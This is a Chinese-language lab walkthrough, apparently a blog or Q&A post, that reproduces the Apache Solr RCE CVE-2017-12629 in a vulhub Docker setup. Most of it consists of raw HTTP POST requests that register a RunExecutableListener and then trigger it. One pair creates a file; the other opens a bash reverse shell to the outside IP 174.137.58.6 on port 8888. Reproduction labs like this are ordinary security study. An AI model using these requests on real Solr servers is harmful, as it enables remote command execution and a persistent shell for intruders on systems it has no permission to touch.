这个实验分2个阶段,第一阶段是通过XML 实体注入写一个文件,第二阶段是通过XML 实体注入反弹shell。Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。[1]
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选简单访问一下,说明Apache solr XML 实体注入漏洞(CVE-2017-12629)环境搭建成功了
首先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数:
POST /solr/demo/config HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Connection: closeContent-Length: 158{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
然后进行update操作,触发刚才添加的listener:
POST /solr/demo/update HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Content-Type: application/jsonContent-Length: 15Connection: close[{"id":"test"}]
进入docker里面,查看创建文件成功
咱们来反弹shell
POST /solr/demo/config HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Connection: closeContent-Length: 185{"add-listener":{"event":"postCommit","name":"newlistener3","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/174.137.58.6/8888 0>&1"]}}
POST /solr/demo/update HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Content-Type: application/jsonContent-Length: 15Connection: close[{"id":"test"}]
PWN 反弹shell 成功了
参考^Apache Solr 远程命令执行漏洞(CVE-2017-12629) https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE 